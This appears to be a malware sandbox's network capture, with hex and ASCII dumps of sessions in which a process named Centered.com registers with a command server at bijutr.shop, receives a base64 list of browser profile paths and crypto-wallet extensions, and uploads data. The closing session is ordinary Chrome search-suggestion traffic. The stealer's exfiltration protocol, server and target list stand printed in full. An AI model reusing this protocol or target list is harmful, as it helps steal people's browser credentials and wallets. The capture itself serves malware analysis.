                                                                                                                                                                                                                                                                                      2024-12-27 06:09:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      2192.168.2.749771188.245.216.205443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:57 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----58Y589HL6P8QIEKNG47Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 255
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:57 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 38 39 48 4c 36 50 38 51 49 45 4b 4e 47 34 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 38 44 30 36 41 39 36 45 46 32 34 32 37 37 34 30 34 34 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 38 39 48 4c 36 50 38 51 49 45 4b 4e 47 34 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 38 39 48 4c 36 50 38 51 49 45 4b 4e 47 34 37 51 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------58Y589HL6P8QIEKNG47QContent-Disposition: form-data; name="hwid"4C8D06A96EF2427740442-a33c7340-61ca------58Y589HL6P8QIEKNG47QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------58Y589HL6P8QIEKNG47Q--
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:09:58 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:58 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|1|f8090c1106931fd0bd02c352c03692b3|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.749776188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:00 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QIWT0R9H4EUAAIWBA16F
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:00 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------QIWT0R9H4EUAAIWBA16FCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:01 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.749781188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:02 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----WLN79ZCTRI58YUAI5PZ5
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------WLN79ZCTRI58YUAI5PZ5Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:03 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.749782188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:05 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----K6XT0RIWTRQQQI5XT00R
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:05 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 58 54 30 52 49 57 54 52 51 51 51 49 35 58 54 30 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------K6XT0RIWTRQQQI5XT00RContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------K6XT0RIWTRQQQI5XT00RContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------K6XT0RIWTRQQQI5XT00RCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:06 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.749783188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:07 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----8GDBAS0ZU37YUAS0ZM7Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6981
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:07 UTC6981OUTData Raw: 2d 2d 2d 2d 2d 2d 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------8GDBAS0ZU37YUAS0ZM7QContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------8GDBAS0ZU37YUAS0ZM7QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------8GDBAS0ZU37YUAS0ZM7QCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:08 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.749784188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:08 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:08 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------9ZUS2DTRQIE3EUS26P8GCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      8192.168.2.749787172.217.21.364437992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:11 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:12 GMT
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-nAYNrubv6A4eDbE5h51ZCg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC124INData Raw: 38 63 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 68 65 20 74 77 69 6c 69 67 68 74 20 73 61 67 61 22 2c 22 75 6e 69 74 65 64 20 61 69 72 6c 69 6e 65 73 20 62 6f 64 79 20 66 6f 75 6e 64 20 69 6e 20 77 68 65 65 6c 20 77 65 6c 6c 22 2c 22 65 70 69 63 20 67 61 6d 65 73 20 73 74 6f 72 65 20 66 72 65 65 20 67 61 6d 65 73 22 2c 22 70 68 69 6c 61 64 65 6c 70 68 69 61 20 70 68
                                                                                                                                                                                                                                                                                      Data Ascii: 8cd)]}'["",["the twilight saga","united airlines body found in wheel well","epic games store free games","philadelphia ph
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC1390INData Raw: 69 6c 6c 69 65 73 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 64 65 63 65 6d 62 65 72 20 32 36 22 2c 22 74 69 6e 79 20 62 72 69 63 6b 20 6f 76 65 6e 20 70 69 7a 7a 61 20 64 61 76 65 20 70 6f 72 74 6e 6f 79 22 2c 22 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 66 6f 72 65 63 61 73 74 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a
                                                                                                                                                                                                                                                                                      Data Ascii: illies","nyt strands december 26","tiny brick oven pizza dave portnoy","aurora borealis northern lights forecast","nintendo switch 2 console"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJ
